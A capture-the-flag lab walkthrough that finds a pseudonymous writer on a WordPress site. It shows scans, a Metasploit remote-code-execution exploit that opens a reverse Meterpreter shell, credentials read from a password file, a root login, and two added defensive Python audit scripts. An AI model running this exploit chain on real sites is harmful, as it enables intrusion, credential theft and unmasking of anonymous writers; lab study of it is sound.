Gridloy News Lab
Recently, a mysterious writer using the pseudonym “Currol” has been publishing striking and influential news articles. The true identity of this writer remains a major mystery. Currol is particularly known for his in-depth analyses in the field of politics, making a name internationally. However, there is no information available about who is behind these writings. Your task is to uncover the real identity of Currol. In this process, your job will involve vulnerability research on the website where the writer’s articles are published.
What is the pseudonym used by the author?
- I visited the website and opened the Contact page; the author's pseudonym is at the bottom of the page.
==> The Answer : Currol
What is the WordPress password?
- Scan the target with nmap.
┌─[✗]─[root@hackerbox]─[~]
└──╼ #nmap 172.20.25.75 -sC -sV -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-30 13:04 CST
Nmap scan report for 172.20.25.75
Host is up (0.00017s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 52:54:00:FB:73:CA (QEMU virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.15 seconds
- Enumerate directories with Gobuster.
┌─[root@hackerbox]─[~]
└──╼ #gobuster dir -u "http://gridloy.hv/" -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://gridloy.hv/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 275]
/.htaccess (Status: 403) [Size: 275]
/.htpasswd (Status: 403) [Size: 275]
/index.php (Status: 301) [Size: 0] [--> http://gridloy.hv/]
/php.ini (Status: 200) [Size: 65]
/server-status (Status: 403) [Size: 275]
/wp-admin (Status: 301) [Size: 311] [--> http://gridloy.hv/wp-admin/]
/wp-content (Status: 301) [Size: 313] [--> http://gridloy.hv/wp-content/]
/wp-includes (Status: 301) [Size: 314] [--> http://gridloy.hv/wp-includes/]
Progress: 4614 / 4615 (99.98%)
/xmlrpc.php (Status: 405) [Size: 42]
===============================================================
Finished
===============================================================
┌─[root@hackerbox]─[~]
└──╼ #
- Next I used WPScan to find the users on this WordPress site.
┌─[root@hackerbox]─[~]
└──╼ #wpscan --url http://gridloy.hv/ --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]N
[+] URL: http://gridloy.hv/ [172.20.25.75]
[+] Started: Sun Nov 30 12:49:46 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.56 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://gridloy.hv/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://gridloy.hv/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://gridloy.hv/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://gridloy.hv/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.4.2 identified (Latest, released on 2023-12-06).
| Found By: Rss Generator (Passive Detection)
| - http://gridloy.hv/?feed=rss2, <generator>https://wordpress.org/?v=6.4.2</generator>
| - http://gridloy.hv/?feed=comments-rss2, <generator>https://wordpress.org/?v=6.4.2</generator>
[+] WordPress theme in use: the-minimal-blogger
| Location: http://gridloy.hv/wp-content/themes/the-minimal-blogger/
| Latest Version: 1.0 (up to date)
| Last Updated: 2024-01-03T00:00:00.000Z
| Readme: http://gridloy.hv/wp-content/themes/the-minimal-blogger/readme.txt
| [!] Directory listing is enabled
| Style URL: http://gridloy.hv/wp-content/themes/the-minimal-blogger/style.css
| Style Name: The Minimal Blogger
| Style URI: https://superbthemes.com/minimalistix/the-minimal-blogger/
| Description: Introducing The Minimal Blogger, a versatile and elegant WordPress theme perfect for bloggers, write...
| Author: superbaddons
| Author URI: http://superbthemes.com/
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://gridloy.hv/wp-content/themes/the-minimal-blogger/style.css, Match: 'Version: 1.0'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=====================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Nov 30 12:49:48 2025
[+] Requests Done: 53
[+] Cached Requests: 6
[+] Data Sent: 12.841 KB
[+] Data Received: 346.741 KB
[+] Memory used: 183.047 MB
[+] Elapsed time: 00:00:01
┌─[root@hackerbox]─[~]
└──╼ #
- The result tells us the user is admin.
- Next comes the most important step: finding vulnerable plugins.
┌─[root@hackerbox]─[~]
└──╼ #wpscan --url http://gridloy.hv/ --enumerate ap --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]N
[+] URL: http://gridloy.hv/ [172.20.25.75]
[+] Started: Sun Nov 30 12:54:42 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.56 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://gridloy.hv/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://gridloy.hv/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://gridloy.hv/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://gridloy.hv/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.4.2 identified (Latest, released on 2023-12-06).
| Found By: Rss Generator (Passive Detection)
| - http://gridloy.hv/?feed=rss2, <generator>https://wordpress.org/?v=6.4.2</generator>
| - http://gridloy.hv/?feed=comments-rss2, <generator>https://wordpress.org/?v=6.4.2</generator>
[+] WordPress theme in use: the-minimal-blogger
| Location: http://gridloy.hv/wp-content/themes/the-minimal-blogger/
| Latest Version: 1.0 (up to date)
| Last Updated: 2024-01-03T00:00:00.000Z
| Readme: http://gridloy.hv/wp-content/themes/the-minimal-blogger/readme.txt
| [!] Directory listing is enabled
| Style URL: http://gridloy.hv/wp-content/themes/the-minimal-blogger/style.css
| Style Name: The Minimal Blogger
| Style URI: https://superbthemes.com/minimalistix/the-minimal-blogger/
| Description: Introducing The Minimal Blogger, a versatile and elegant WordPress theme perfect for bloggers, write...
| Author: superbaddons
| Author URI: http://superbthemes.com/
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://gridloy.hv/wp-content/themes/the-minimal-blogger/style.css, Match: 'Version: 1.0'
[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:00:45 <=============================================================================> (104378 / 104378) 100.00% Time: 00:00:45
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://gridloy.hv/wp-content/plugins/akismet/
| Latest Version: 5.3.1
| Last Updated: 2024-01-17T22:32:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/akismet/, status: 403
|
| The version could not be determined.
[+] elementor
| Location: http://gridloy.hv/wp-content/plugins/elementor/
| Latest Version: 3.18.3 (up to date)
| Last Updated: 2023-12-20T16:49:00.000Z
| Readme: http://gridloy.hv/wp-content/plugins/elementor/readme.txt
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/elementor/, status: 200
|
| Version: 3.18.3 (100% confidence)
| Found By: Query Parameter (Passive Detection)
| - http://gridloy.hv/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.18.3
| Confirmed By:
| Readme - Stable Tag (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/elementor/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/elementor/readme.txt
[+] royal-elementor-addons
| Location: http://gridloy.hv/wp-content/plugins/royal-elementor-addons/
| Last Updated: 2024-01-25T13:58:00.000Z
| Readme: http://gridloy.hv/wp-content/plugins/royal-elementor-addons/readme.txt
| [!] The version is out of date, the latest version is 1.3.87
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/royal-elementor-addons/, status: 200
|
| Version: 1.3.78 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/royal-elementor-addons/readme.txt
[+] wp-file-manager
| Location: http://gridloy.hv/wp-content/plugins/wp-file-manager/
| Latest Version: 7.2.2 (up to date)
| Last Updated: 2024-01-18T09:52:00.000Z
| Readme: http://gridloy.hv/wp-content/plugins/wp-file-manager/readme.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/wp-file-manager/, status: 200
|
| Version: 7.2.2 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/wp-file-manager/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/wp-file-manager/readme.txt
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Nov 30 12:55:34 2025
[+] Requests Done: 104395
[+] Cached Requests: 43
[+] Data Sent: 22.55 MB
[+] Data Received: 14.069 MB
[+] Memory used: 503.859 MB
[+] Elapsed time: 00:00:52
┌─[root@hackerbox]─[~]
└──╼ #
- My target is the royal-elementor-addons plugin because it is version 1.3.78, and I found a payload for it in Metasploit:
[+] royal-elementor-addons
| Location: http://gridloy.hv/wp-content/plugins/royal-elementor-addons/
| Last Updated: 2024-01-25T13:58:00.000Z
| Readme: http://gridloy.hv/wp-content/plugins/royal-elementor-addons/readme.txt
| [!] The version is out of date, the latest version is 1.3.87
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/royal-elementor-addons/, status: 200
|
| Version: 1.3.78 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/royal-elementor-addons/readme.txt
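Read from the site owner's side, the scan output above already names what to fix: an outdated plugin and plugin directories with listing enabled. The following added example (not part of the original write-up) parses WPScan's text output into a patch queue; the function names, severity labels and the trimmed sample are constructed for illustration.

```python
import re

# Constructed sample: plugin blocks trimmed from the WPScan output above.
SAMPLE = """\
[+] elementor
 | Location: http://gridloy.hv/wp-content/plugins/elementor/
 | [!] Directory listing is enabled
 | Version: 3.18.3 (100% confidence)
[+] royal-elementor-addons
 | Location: http://gridloy.hv/wp-content/plugins/royal-elementor-addons/
 | [!] The version is out of date, the latest version is 1.3.87
 | [!] Directory listing is enabled
 | Version: 1.3.78 (80% confidence)
[+] akismet
 | Location: http://gridloy.hv/wp-content/plugins/akismet/
 | The version could not be determined.
"""

LOCATION = re.compile(r"\|\s*Location: \S*/wp-content/plugins/([^/\s]+)/")
OUTDATED = re.compile(r"The version is out of date, the latest version is (\S+)")
VERSION = re.compile(r"^\|\s*Version: (\S+) \((\d+)% confidence\)")

def parse_plugins(text):
    """Collect one record per plugin block, keyed on its Location line."""
    plugins, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith("|"):
            cur = None  # a "[+]"/"[i]" header or blank line closes the block
        elif (m := LOCATION.search(line)):
            cur = dict(slug=m.group(1), installed=None, confidence=0, latest=None, listing=False)
            plugins.append(cur)
        elif cur is None:
            pass  # detail line of a theme or other non-plugin finding
        elif (m := OUTDATED.search(line)):
            cur["latest"] = m.group(1)
        elif (m := VERSION.match(line)):
            cur["installed"], cur["confidence"] = m.group(1), int(m.group(2))
        elif "Directory listing is enabled" in line:
            cur["listing"] = True
    return plugins

def triage(plugins):
    """Turn parsed records into (slug, severity, reason) patch-queue entries."""
    out = []
    for p in plugins:
        if p["latest"]:
            out.append((p["slug"], "HIGH",
                        f"outdated: {p['installed']} installed, {p['latest']} available"))
        elif p["installed"] is None:
            out.append((p["slug"], "REVIEW", "version unknown; verify on the host"))
        if p["listing"]:
            out.append((p["slug"], "MEDIUM", "directory listing enabled"))
    return out
```

Calling `triage(parse_plugins(text))` on a saved scan puts royal-elementor-addons at the top of the queue, which is the same plugin the walkthrough goes on to target.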
- Search for the royal-elementor-addons payload and attack.
msf6 > search wp_royal_elementor_addons
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/wp_royal_elementor_addons_rce 2023-11-23 excellent Yes WordPress Royal Elementor Addons RCE
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/wp_royal_elementor_addons_rce
msf6 > use 0
[*] No payload configured, defaulting to cmd/linux/http/aarch64/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) >
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > set RHOSTS 172.20.25.75
RHOSTS => 172.20.25.75
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > set RPORT 80
RPORT => 80
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > set SSl false
SSl => false
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > set ForceExploit true
ForceExploit => true
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > run
[*] Started reverse TCP handler on 172.20.25.180:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation.
[*] Attempting to retrieve nonce...
[-] Exploit aborted due to failure: no-target: Nonce not found in the response. Is Royal Elementor Addons activated AND being used by the WordPress site being targeted?
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > set TARGETURI /wordpress/
TARGETURI => /wordpress/
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > run
[*] Started reverse TCP handler on 172.20.25.180:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.4.2
[+] Detected Royal Elementor Addons version: 1.3.78
[+] The target appears to be vulnerable.
[*] Attempting to retrieve nonce...
[+] Nonce found in response: "14f556e193"
[*] Sending payload
[+] Payload uploaded successfully
[*] Triggering the payload
[*] Sending stage (40004 bytes) to 172.20.25.75
[*] Meterpreter session 1 opened (172.20.25.180:4444 -> 172.20.25.75:57346) at 2025-11-30 13:15:21 -0600
meterpreter >
- I looked around briefly and found the answer:
pwd
/var/www/html/wordpress
ls
index.php
license.txt
my_passwords.txt
php.ini
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
cat my*
EMAIL: beth@gridloy.hv
PASSWORD: tears-cartoon
WORDPRESS
USERNAME: admin
PASSWORD: b2tGAIvRDpJpNit6q2
MYSQL
USERNAME: root
PASSWORD: LhfJ5DuAYN5nsSvB
USERS
USER: root
PASSWORD: aceRyanDI
==> The Answer : b2tGAIvRDpJpNit6q2
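The credentials above sat in a plain-text file inside the web root, next to the WordPress core files. The following added example (not from the original write-up) audits a document root for static files that contain credential-like lines; the extension list, the regex and the fixture are assumptions, and the fixture uses placeholder values rather than the lab's.

```python
import os
import re
import tempfile

# Assumption: these extensions are returned as plain text by the web server, not executed.
STATIC_EXT = {".txt", ".ini", ".bak", ".sql", ".log", ".old"}
CRED_LINE = re.compile(r"^\s*(pass(word)?|pwd|secret)\s*[:=]\s*\S+", re.I)

def audit_docroot(docroot):
    """Return sorted (relative_path, credential_lines, world_readable) for risky static files."""
    hits = []
    for base, _dirs, files in os.walk(docroot):
        for name in files:
            if os.path.splitext(name)[1].lower() not in STATIC_EXT:
                continue  # .php and similar are executed, not disclosed as text
            path = os.path.join(base, name)
            try:
                with open(path, errors="replace") as fh:
                    count = sum(1 for line in fh if CRED_LINE.match(line))
            except OSError:
                continue  # unreadable to the auditor; skip rather than abort
            if count:
                world = bool(os.stat(path).st_mode & 0o004)
                hits.append((os.path.relpath(path, docroot), count, world))
    return sorted(hits)

def build_sample_docroot():
    """Constructed fixture that mirrors the directory listing above."""
    root = tempfile.mkdtemp(prefix="docroot-")
    files = {
        "my_passwords.txt": "WORDPRESS\nUSERNAME: admin\nPASSWORD: placeholder-1\n"
                            "MYSQL\nUSERNAME: root\nPASSWORD: placeholder-2\n",
        "license.txt": "GNU GENERAL PUBLIC LICENSE\n",
        "wp-config.php": "<?php define('DB_PASSWORD', 'placeholder');\n",
        "php.ini": "display_errors = Off\n",
    }
    for name, body in files.items():
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, 0o644)  # typical web-root permissions
    return root

if __name__ == "__main__":
    for hit in audit_docroot(build_sample_docroot()):
        print(hit)
```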
Who is the author of the unpublished comment?
- Once I had the admin password, I logged in to the wp-admin dashboard and went to the comments, which gave me the answer to this question!
==> The Answer : Judson Braun
What is the real name and surname of the writer using the pseudonym “Currol”?
- For this step I figured I needed to escalate privileges, since most labs work that way :))
- I searched for ages without working out how to escalate, but in question 2 we already got the root password, so why keep looking :))
su root
Password: aceRyanDI
ls
index.php
license.txt
my_passwords.txt
php.ini
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
cd /root
ls
site_owner_informations.txt
cat *
SITE OWNER: Beth Reese
PSEUDONYM: Currol
EMAIL: jane.smith@blogsite.com
PHONE: +1-234-567-8901
ADDRESS:
1234 Liberty Lane,
Emerald City, Cascadia, 98765
United States
==> The Answer : Beth Reese